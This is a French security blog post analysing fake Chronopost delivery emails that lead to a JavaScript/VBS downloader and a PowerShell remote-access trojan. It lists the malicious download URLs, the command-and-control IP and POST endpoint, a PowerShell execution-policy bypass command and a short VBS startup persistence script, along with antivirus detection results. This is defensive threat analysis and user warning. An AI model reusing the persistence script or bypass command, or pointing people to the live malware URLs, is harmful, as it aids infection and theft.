Menu Fermer

Virus Chronopost par mail : Trojan:Win32/Wacatac.B!ml et Trojan RAT

A l’approche du Black Friday et des fêtes de fin d’année, les mails de phishing et autres arnaques menant à des contenus malveillants vont augmenter.
Ici il s’agit d’un mail de phishing Chronopost menant à un malware.
Cela n’a rien de nouveau puisque j’avais déjà publié un article concernant ce type d’attaque : Virus Chronopost : les faux mails

Voici une description d’un mail reçu hier menant à un Trojan:Win32/Wacatac.B!ml pour télécharger la charge utile un Trojan RAT en PowerShell.

Virus Chronopost par mail : Trojan:Win32/Wacatac.B!ml et Trojan RAT

Virus Chronopost par mail : Trojan:Win32/Wacatac.B!ml et Trojan RAT

Tout d’abord le mail de phishing Chronopost indiquant que votre colis est en cours de livraison avec un lien cliquable.
Rien de vraiment nouveau pour tromper les internautes.
On notera cette fois-ci l’effort de tenter d’envoyer un mail avec une adresse Chronopost valide, ici [email protected].
Par contre, il y a un problème de chargement des images car les liens sont en HTTP et non en HTTPS, ce qui pose problème sur les webmail.
En effet, cela charge du contenu mixte, c’est à dire non sécurisé sur un site sécurisé.

Phishing malveillant Chronopost

Le lien mène https://bit.ly/3HHFyOy ce qui normalement doit déjà mettre à la puce à l’oreille des internautes concernant la véracité du mail.

Phishing malveillant Chronopost

Le lien bitly mène à un service d’hébergement filetransfert.io :

https://filetransfer.io/data-package/NzW3Zzyf/download
Lien malveillant bitly dans un faux mail Chronopost

Cela mène à un fichier Colis_____FR2882902991J01.js détecté en Trojan:Win32/Wacatac.B!ml
Les détections données sur VirusTotal sont relativement bonnes permettant de bloquer la chaîne malveillant dès son origine :

https://www.virustotal.com/gui/file/e35e763776db94920d9bbe44934692e656adf18a5f20f3911688ff95c2cd40b3
Détection : 18 / 57
e35e763776db94920d9bbe44934692e656adf18a5f20f3911688ff95c2cd40b3
Colis_____FR2882902991J01.js 13.53 KB

Exploit.HTML-PowerShell.Gen ALYac
Heur.BZC.UGZ.Boxter.1.13AE875D
Arcabit Exploit.HTML-PowerShell.Gen
Avast Script:SNH-gen [Trj]
AVG Script:SNH-gen [Trj]
BitDefender Exploit.HTML-PowerShell.Gen
Emsisoft Exploit.HTML-PowerShell.Gen (B)
eScan Exploit.HTML-PowerShell.Gen
ESET-NOD32 JS/Agent.QLX
FireEye Exploit.HTML-PowerShell.Gen
GData Heur.BZC.UGZ.Boxter.1.13AE875D
Kaspersky HEUR:Trojan-Downloader.Script.Generic
Lionic Trojan.Script.Generic.a!c MAX
Malware (ai Score=84) 
Microsoft Trojan:Script/Sabsik.FL.B!ml N
ANO-Antivirus Trojan.Script.Heuristic-js.iacgm
Symantec Trojan.Gen.NPE Tencent
Win32.Exploit.Html.Llrc
Trojan:Win32/Wacatac.B!ml détecté par Windows Defender sur Colis_____FR2882902991J01.js

Ce dernier est un Script VBS qui télécharge et exécute un autre malware via une commande PowerShell d’où la détection Trojan.Script ou Exploit.HTML-PowerShell.
Le malware téléchargé se trouve sur un site WordPress hacké :

https://cursosinf.webs.upv.es/wp-includes/css/dist/nux/windows11.txt
Trojan.Script ou Exploit.HTML-PowerShell pour télécharger et installer un Trojan RAT

Le fichier PowerShell mène vers la charge utile, un Trojan RAT lui aussi écrit en PowerShell.
Ce dernier s’installe dans C:\Users\Public\windows11.PS1 :

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Public\windows11.PS1'"

Le centre de contrôle se trouve sur l’IP 185.81.157.136 qui se trouve en France :

AS      | IP               | BGP Prefix          | CC | Registry | Allocated  | AS Name
198375  | 185.81.157.136   | 185.81.156.0/22     | FR | ripencc  | 2014-12-17 | INU-AS, FR
Trojan RAT en Powershell

Notamment il effectue des POST sur l’URL http://185.81.157.136:1188/Vre
Il s’agit d’un VPS chez un hébergeur Français Inulogic, tout comme dans ce lien : Faux mail Chronopost et virus

La connexion du Trojan RAT vers le serveur de contrôle

Les détections sont très mauvaises puisque seulement 5 antivirus le détectent :

https://www.virustotal.com/gui/file/aca6c2ad07c13183bd708115f215a27993e95532d920ca259646e11a74820d9a

aca6c2ad07c13183bd708115f215a27993e95532d920ca259646e11a74820d9a
windows11.ps1
4.84 KB Size
2021-11-22 17:43:03 UTC 16 hours ago
calls-wmi checks-network-adapters detect-debug-environment direct-cpu-clock-access powershell runtime-modules url-

Avast SNH:Script [Dropper]
AVG SNH:Script [Dropper]
DrWeb Trojan.DownLoader41.16791
ESET-NOD32 PowerShell/Agent.WH
Détection du Trojan RAT en PowerShell

Enfin pour se rendre actif au démarrage, le malware créé un fichier Shell:Startup\Windows10December.vbs.
Ce dernier a simplement pour objectif d’exécuter le Trojan RAT au démarrage de Windows.

Set OBB = CreateObject("WScript.Shell")
OBB.Run "PowerShell -ExecutionPolicy RemoteSigned -File "+"C:\Users\Public\windows11.PS1",0
Le Trojan PowerShell s'installe au démarrage de Windows

On voit donc Windows10December.vbs dans la liste des programmes au démarrage de Windows.

Le Trojan PowerShell s'installe au démarrage de Windows

La détection de ce dernier est vierge sur VirusTotal, aucun antivirus ne le détecte.
Après il ne s’agit que de deux lignes de code pour exécuter un autre script =)

Aucune détection antivirus sur le fichier VBS

Si vous avez été touché par ce malware, le plus simple est de venir se faire désinfecter sur le forum du site (c’est gratuit).
Eventuellement suivre ce tutoriel :

Enfin lorsque vous recevez un mail suivez les recommandations de mon article : Le phishing ou hameçonnage par mail

EDIT – Nouveau faux mail Chronopost au 24/12

Nouvelle campagne de faux mail Chronopost “Votre colis est en cours de livraison

Faux mail Chronopost:  Votre colis est en cours de livraison

Le mail contient un lien malveillant https://tiny.cc/vbwmuz qui redirige vers un fichier Colis__FR85315469J02.js hébergé chez filestransfer.io
15 détections positives sur VirusTotal avec des détections du type Script:SNH-gen [Trj], Exploit.HTML-PowerShell.Gen, Trojan:Script/Sabsik.FL.B!ml, HEUR:Trojan-Downloader.Script.Generic : https://www.virustotal.com/gui/file/713ae13e3ceb04e8abc1f4d1eeaff902d7987f84326214db1c22720d478369e6/detection

Téléchargement du malware  Script:SNH-gen [Trj], Exploit.HTML-PowerShell.Gen, Trojan:Script/Sabsik.FL.B!ml, HEUR:Trojan-Downloader.Script.Generic :

Il s’agit d’un script malveillant VBS qui exécute une commande PowerShell pour télécharger un autre script à l’adresse https://textbin.net/raw/equdutf9zu.

Téléchargement d'un malware en VBS

Cela conduit à nouveau à un script PowerShell…

Trojan Downloader PowerShell

.. qui au final renvoie vers le même type de malware que précédemment.
Ce dernier contacte le même serveur 185.81.157.136 utilisant toujours le même hébergeur INULOGIC SARL.

Trojan RAT PowerShell